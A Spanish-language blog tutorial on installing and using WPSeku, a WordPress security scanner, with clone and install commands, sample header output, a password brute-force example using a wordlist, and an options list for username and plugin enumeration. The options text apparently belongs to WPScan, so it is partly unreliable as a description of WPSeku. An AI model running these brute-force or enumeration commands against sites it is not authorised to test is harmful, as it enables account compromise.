WPSeku – WordPress Security Scanner.
En un anterior articulo, vimos una fabulosa herramienta que analizaba la seguridad de nuestras aplicaciones web, WAScan.
Hoy… y de la mano del mismo desarrollador (m4ll0k), te presento el security scanner que a creado, WPSeku.
WPSeku es una variante de WAScan, pero orientado exclusivamente a comprobar la seguridad de un entorno o sitio web que trabaje bajo WordPress. Tiene la ventaja de que podemos escanear nuestras instalaciones remotas de WordPress e identificar sus problemas de seguridad.
Su instalación y uso es simple, lo vemos.
Instalar WPSeku – WordPress Security Scanner
Clonamos el repo.
git clone https://github.com/m4ll0k/WPSeku.git wpseku
Vamos al directorio.
cd wpseku
Instalamos.
pip3 install -r requirements.txt
Si aparece un mensaje similar a este…
You are using pip version 9.0.1, however version 9.0.3 is available.
actualiza el pip.
pip install --upgrade pip
Como ves su instalación es rápida, vamos a su uso.
Uso de WPSeku – WordPress Security Scanner
El comando de ejecución base es:
python3 wpseku.py
Pero claro… el anterior comando no escanea ninguna url, así que aplicamos opciones para que investigue un sitio web.
Debo decirte que en este ejemplo, el comando no es excesivamente intrusivo y no aplicara Brute Force.
python3 wpseku.py --url https://www.tusitio.com --verbose
Ejemplo de salida…
—————————————-
_ _ _ ___ ___ ___| |_ _ _
| | | | . |_ -| -_| ‘_| | |
|_____| _|___|___|_,_|___|
|_| v0.4.0
WPSeku – WordPress Security Scanner
by Momo Outaadi (m4ll0k)
—————————————-
[ + ] Target: https://www.tusitioweb.com
[ + ] Starting: 10:38:47
[ + ] Server: nginx
[ + ] Uncommon header «content-type» found, with contents: text/html; charset=UTF-8
[ + ] Uncommon header «date» found, with contents: Thu, 05 Apr 2018 07:38:47 GMT
[ + ] Uncommon header «connection» found, with contents: keep-alive
[ + ] Uncommon header «last-modified» found, with contents: Tue, 03 Apr 2018 10:14:30 GMT
[ + ] Uncommon header «x-powered-by» found, with contents: PHP/7.2.4
[ + ] Uncommon header «content-length» found, with contents: 10038
[ + ] Uncommon header «keep-alive» found, with contents: timeout=60
[ + ] Uncommon header «server» found, with contents: nginx
[ + ] Uncommon header «cache-control» found, with contents: max-age=0
[ + ] Uncommon header «content-encoding» found, with contents: gzip
[ + ] Uncommon header «expires» found, with contents: Thu, 05 Apr 2018 07:38:47 GMT
[ + ] Uncommon header «vary» found, with contents: Accept-Encoding
etc…….etc………..
También puedes comprobar la fortaleza de tu contraseña, aplicando un archivo wordlist.
python3 wpseku.py --url https://www.tusitio.com --brute --user prueba --wordlist wl.txt --verbose
Ahora comprobamos el código de wordpress, los plugins y templates.
python3 wpseku.py --scan <dir/file> --verbose
Como puedes observar tienes infinidad de posibilidades, y para ayudarte a ello puedes usar estos argumentos:
--update Update the database to the latest version.
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
vp only vulnerable plugins
ap all plugins (can take a long time)
tt timthumbs
t themes
vt only vulnerable themes
at all themes (can take a long time)
Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
If no option is supplied, the default is "vt,tt,u,vp"
--exclude-content-based "<regexp or string>"
Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.
You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).
--config-file | -c <config file> Use the specified config file, see the example.conf.json.
--user-agent | -a <User-Agent> Use the specified User-Agent.
--cookie <string> String to read cookies from.
--random-agent | -r Use a random User-Agent.
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--batch Never ask for user input, use the default behaviour.
--no-color Do not use colors in the output.
--log [filename] Creates a log.txt file with WPScan's output if no filename is supplied. Otherwise the filename is used for logging.
--no-banner Prevents the WPScan banner from being displayed.
--disable-accept-header Prevents WPScan sending the Accept HTTP header.
--disable-referer Prevents setting the Referer header.
--disable-tls-checks Disables SSL/TLS certificate verification.
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specify it.
Subdirectories are allowed.
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory.
If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.
If no protocol is given (format host:port), HTTP will be used.
--proxy-auth <username:password> Supply the proxy login credentials.
--basic-auth <username:password> Set the HTTP Basic authentication.
--wordlist | -w <wordlist> Supply a wordlist for the password brute forcer.
If the "-" option is supplied, the wordlist is expected via STDIN.
--username | -U <username> Only brute force the supplied username.
--usernames <path-to-file> Only brute force the usernames from the file.
--cache-dir <cache-directory> Set the cache directory.
--cache-ttl <cache-ttl> Typhoeus cache TTL.
--request-timeout <request-timeout> Request Timeout.
--connect-timeout <connect-timeout> Connect Timeout.
--threads | -t <number of threads> The number of threads to use when multi-threading requests.
--throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1.
--help | -h This help screen.
--verbose | -v Verbose output.
--version Output the current version and exit.
Te recomiendo que visites está pagina, donde podrás estar al día de todas las vulnerabilidades que se localizan en wordpres, así como en sus plugins y templates.
Recuerda que este «Security Scanner«, es de uso privado y sobre tu propio sistema.